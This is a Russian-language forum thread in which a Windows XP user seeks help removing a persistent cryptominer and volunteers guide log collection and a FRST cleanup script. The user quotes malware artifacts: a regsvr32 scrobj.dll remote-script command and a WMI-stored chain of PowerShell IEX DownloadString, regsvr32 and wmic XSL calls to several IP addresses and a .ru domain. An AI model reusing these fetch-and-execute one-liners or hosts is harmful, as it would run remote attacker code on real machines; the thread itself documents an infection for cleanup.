1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
1 | |
Поймал вирус (предположительно майнер)07.01.2022, 17:46. Показов 2974. Ответов 30
Метки нет (Все метки)
Здравствуйте. Антивирус в системе не стоит, т.к. слабенькая.
На винчестере три раздела и два Windows - XP и Vista. В основном работаю на С: под ХР. Поймал вирус (предположительно майнер) еще летом 2021 года. Прошло уже больше 3-х месяцев. Грузит систему периодически до 100%. Часть вируса удалил в начале осени, но вижу, что не всё. Удалил (возможно не всё перечислил): [1].txt a.bat conhoy.exe CONHOY.EXE-1EC51B50.pf11 shell.rar c:\WINDOWS\Debug\item.dat c:\WINDOWS\inf\aspnet\lsma12.exe c:\System Volume Information\_restore{6B76C70F-5D28-4A66-9153-CE979AEAF7D5}\RP129\A0091495.INI 62байта ??? c:\WINDOWS\system32\n1.dat Служба apzZ C:\WINDOWS\system32\regsvr32.exe apzZ 12% apzZ Auto on startup Сервер регистрации, (C) Microsoft Корпорация Майкрософт cmd /c regsvr32 /s /u /n /i:http://185.47.128.124:8124/m17010.txt scrobj.dll 2021-08-29 14:07 own process Trojan.BitCoinMiner.TskLnk, C:\WINDOWS\inf\aspnet\lsma12.exe В процессе работы над отчетом блокировался доступ к вэб-сайтам антивирусов. Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст. Также зависала система и испортился Malwarebytes. По теме загрузки отчета есть несколько замечаний. При попытке запустить AutoLogger (скачанный по ссылке из Правил оформления) пишет "Пожалуйста, скачайте свежую версию автосборщика логов". В файле Date.ini из папки AutoLogger\AV поменял вручную дату на более близкую - только тогда AutoLogger запустился. Думаю, нужно в выложенном для скачивания архиве периодически менять дату в файле Date.ini на более актуальную. И ещё. Базы обновить невозможно, так как пункт обновления в меню Файл не активен. Буду благодарен за помощь.
0
|
07.01.2022, 17:46 | |
Ответы с готовыми решениями:
30
Предположительно поймал майнер Поймал вирус(подозрение на майнер) Поймал вирус майнер. Не помогает Malwarebytes Успешно поймал очень жесткий вирус-майнер Поймал майнер(или вирус) - MicrosoftHost.exe нагружает систему на 50% |
13112 / 7261 / 1537
Регистрация: 06.09.2009
Сообщений: 26,506
|
|
07.01.2022, 18:40 | 2 |
на время сбора логов не нужно просто заниматься и другими делами параллельно на компьютере. Это всего лишь проверка на кейлоггеры.
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files. 3. Нажмите кнопку Scan (Сканировать). 4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. 5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). 6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
07.01.2022, 19:56 [ТС] | 3 |
Проблемы с печатаньем текста заметил до сбора логов.
Ещё вопрос - у меня почему то две учетные записи Administrator. Я вроде вторую не создавал. Всегда работал под Isvaripati. Может это относится к вирусу? Можна Admin удалить?
0
|
13112 / 7261 / 1537
Регистрация: 06.09.2009
Сообщений: 26,506
|
|
07.01.2022, 21:32 | 4 |
Да что Вы говорите. Уж я-то знаю хорошо поведение AVZ при сборе логов.
Ничего необычного в системе, кроме мусора. Да и система вряд ли лицензионная. Возможно это встроенный Администратор. Просто отключите. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Код
Start:: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {0f7f9062-5667-11ec-a40d-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {43c74f4a-bcc0-11e3-9755-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {4f74d530-d7ac-11ea-a250-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {7232c450-2a53-11e5-9a48-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {bfaadc08-9df1-11e8-a06e-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {cbb734b0-d89e-11e2-95b4-001c2689cc88} - G:\AutoRun.exe HKU\S-1-5-21-725345543-764733703-1417001333-1003\...\MountPoints2: {f6447094-d899-11e2-95b1-001c2689cc88} - G:\AutoRun.exe GroupPolicy: Restriction ? <==== ATTENTION GroupPolicy\User: Restriction ? <==== ATTENTION Policies: C:\Documents and Settings\All Users\NTUSER.pol: Restriction <==== ATTENTION Policies: C:\Documents and Settings\Isvaripati\NTUSER.pol: Restriction <==== ATTENTION HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll [2011-11-10] () <==== ATTENTION [zero byte File/Folder] Reboot: End:: 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
08.01.2022, 17:46 [ТС] | 5 |
"Ничего необычного в системе" не видно, но компьютер нагружается.
svchost.exe занимает необычно много памяти в процессах. В файл hosts сама добавляется строка с блокировкой сайта Malwarebytes (возможно в момент начала работы программы) И удаленные строки из C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA на следующий день снова на месте: md /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://155.94.235.39:8039/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://155.94.235.39:8039/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
0
|
13112 / 7261 / 1537
Регистрация: 06.09.2009
Сообщений: 26,506
|
|
08.01.2022, 17:49 | 6 |
И сейчас на месте? Если так, то не занимайтесь самолечением и сделайте новые логи Autologger
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
08.01.2022, 18:16 [ТС] | 7 |
Эти логи актуальные (строки присутствуют в файле OBJECTS.DATA).
Удалял позавчера вечером, а вчера утром они уже были снова в файле. Такое впечатление, что что то вмешивается в работу антивирусных (сборщиков логов) программ. Когда запускал AVZ позавчера, он показывал больше угроз. Я как раз вникал в проблемму, практически ничего не удалял. Только явные строки из OBJECTS.DATA. Я теперь и AVZ и Malwarebytes ничего не находят практически. Вопрос. Скачал ряд программ из вашего раздела "Инструментарий консультанта", проверяю на VirusTotal и везде показывает несколько вирусов в файлах. Как так может быть? Добавлено через 3 минуты https://www.virustotal.com/gui... ?nocache=1 Ссылка для примера.
0
|
13112 / 7261 / 1537
Регистрация: 06.09.2009
Сообщений: 26,506
|
|
08.01.2022, 19:24 | 8 |
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
08.01.2022, 19:44 [ТС] | 9 |
Я строчку в hosts несколько раз удалял вручную, но она спонтанно появляется.
0
|
13112 / 7261 / 1537
Регистрация: 06.09.2009
Сообщений: 26,506
|
|
08.01.2022, 21:06 | 10 |
Я спрашивал о ее наличии в настоящий момент
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
08.01.2022, 21:55 [ТС] | 11 |
Даже не знаю, как ответить. Она может появиться через несколько минут после удаления. Сейчас, на момент выключения компа не было.
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
09.01.2022, 19:28 [ТС] | 13 |
Сделал
0
|
21567 / 15518 / 2989
Регистрация: 08.10.2012
Сообщений: 63,089
|
|
10.01.2022, 09:16 | 14 |
Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.3.1.0.28_11.10.2020_15.52.14_log.txt
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
10.01.2022, 13:00 [ТС] | 15 |
На всякий случай сделал 2 лога:
1. Без изменения настроек. 2. С галочкой на "Проверять цифровые сертификаты".
0
|
21567 / 15518 / 2989
Регистрация: 08.10.2012
Сообщений: 63,089
|
|
10.01.2022, 13:32 | 16 |
Удалите старые и соберите новые логи FRST.txt и Addition.txt
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
10.01.2022, 15:26 [ТС] | 17 |
Еще раз отмечу, что поймал вирус еще летом 2021 года. Прошло уже больше 3-х месяцев.
0
|
21567 / 15518 / 2989
Регистрация: 08.10.2012
Сообщений: 63,089
|
|
10.01.2022, 15:42 | 18 |
Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.
Деинсталлируйте больше не поддерживаемый:
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
10.01.2022, 16:19 [ТС] | 19 |
Весело, после первого отчета файл FRST.exe оказался у себя в карантине. Воспользовался копией.
После скрипта комп сам не перегрузился. Перегрузил вручную. После перезагрузки все также гудит.
0
|
1 / 1 / 0
Регистрация: 30.12.2017
Сообщений: 24
|
|
10.01.2022, 16:22 [ТС] | 20 |
Деинсталлировать можно без потери функциональности? Или Flash и Java уже вообще не актуальны? Удалять через Удаление программ или скачивать спецутилиты для полной деинсталяции?
0
|
10.01.2022, 16:22 | |
10.01.2022, 16:22 | |
Помогаю со студенческими работами здесь
20
Поймал вирус-майнер "RobotDemo.exe" Я поймал майнер Поймал майнер Поймал майнер Поймал майнер Поймал майнер Искать еще темы с ответами Или воспользуйтесь поиском по форуму: |